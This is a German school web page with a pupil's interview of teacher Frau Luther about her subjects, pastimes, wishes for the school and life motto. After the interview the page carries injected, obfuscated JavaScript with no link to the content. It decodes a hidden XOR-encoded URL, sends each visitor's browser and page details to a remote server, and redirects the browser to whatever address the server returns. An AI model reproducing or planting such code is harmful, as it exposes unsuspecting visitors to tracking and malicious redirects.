GSS Rodgau · Personen

Lehrerinterview: Frau Luther

Welche Fächer unterrichten Sie, welches ist Ihr Lieblingsfach und für welches Fach interessieren Sie sich, obwohl Sie es nicht unterrichten?

Derzeit unterrichte ich nur Ethik. Außerdem leite ich zwei Deutschförderkurse. Ethik und Deutsch unterrichte ich sehr gern. Mein Lieblingsfach ist allerdings PoWi und ich hoffe, dass ich es im nächsten Schuljahr wieder lehren kann.

 Was waren Ihre Lieblingsfächer als Schulkind?

Meine Lieblingsfächer waren Deutsch und Kunst.

Was wollten Sie als Kind für einen Beruf erlernen?

Ich wollte Schriftstellerin oder Journalistin werden.

Wenn Sie für einen Tag lang ein Tier sein könnten, welches wäre das und wieso?

Ich wäre gern einmal ein Adler, dann könnte ich schnell an andere Orte fliegen und neue Städte und Länder kennen lernen.

Was macht Ihnen an Ihrem Beruf am meisten Spaß?

Mir machen die Stunden Spaß, bei denen die Schüler Feuer und Flamme bei der Arbeit sind und mir das Gefühl geben, dass sie bei der Arbeit etwas für ihr Leben lernen.

Welche Eigenschaften schätzen Sie an den Schülern (und welche nicht)?

Kreativität, Motivation und Selbstbewusstsein schätze ich. Arroganz und Egoismus mag ich nicht so gern.

Was würden Sie an dieser Schule verändern, wenn Sie könnten?

Kleinere Klassen fände ich schön für Schüler/innen und Lehrer/innen. Außerdem wünsche ich mir ein zusätzliches Reingehen-Klingeln, damit die Schüler lernen nach der Pause pünktlich zum Unterricht zu kommen.

Wen oder was würden Sie als erstes retten, wenn die Schule brennt?

Als erstes würde ich die Klasse retten, die ich in dem Moment unterrichte; danach würde ich Frau Haase retten, damit sie sooo dankbar ist, dass sie mir im nächsten Schuljahr einen extra tollen Stundenplan gibt.

Was würden Sie mit 1 000 000 € machen?

Ich würde mir ein Haus kaufen und weniger Stunden arbeiten, um mehr Zeit mit meiner Familie zu verbringen.

Wie erholen Sie sich von „uns“?

Ich schlafe viel und unternehme Ausflüge mit meiner Familie.

Bereiten sie eigentlich jede Stunde vor?

Nein, aber ich weiß vor jeder Stunde immer ungefähr was ich mit den Schülern/innen machen möchten und was sie in der Stunde lernen sollen.

Haben Sie ein Lebensmotto, wenn ja, welches?

Nichts Großartiges wurde je ohne Enthusiasmus geschaffen.

Was war der schönste Moment als Lehrer an dieser Schule?

Wenn Schüler sich wünschen, dass ich die Klasse im nächsten Schuljahr wiederbekomme, ist das toll für mich. Oder auch, wenn Schüler mir so sehr vertrauen, dass sie bei mir Rat suchen.

Gibt es einen Ort, wo Sie gerne einmal Urlaub machen wollen?

An einen Ort mit türkisen Wasser, weißen Strand, keinem Internet und viele Bücher, die ich in der Hängematte lesen kann.

Interview wurde durchgeführt von Maya, 6eG

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = „“; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden /  Ändern )

Google Foto

Du kommentierst mit Deinem Google-Konto. Abmelden /  Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden /  Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.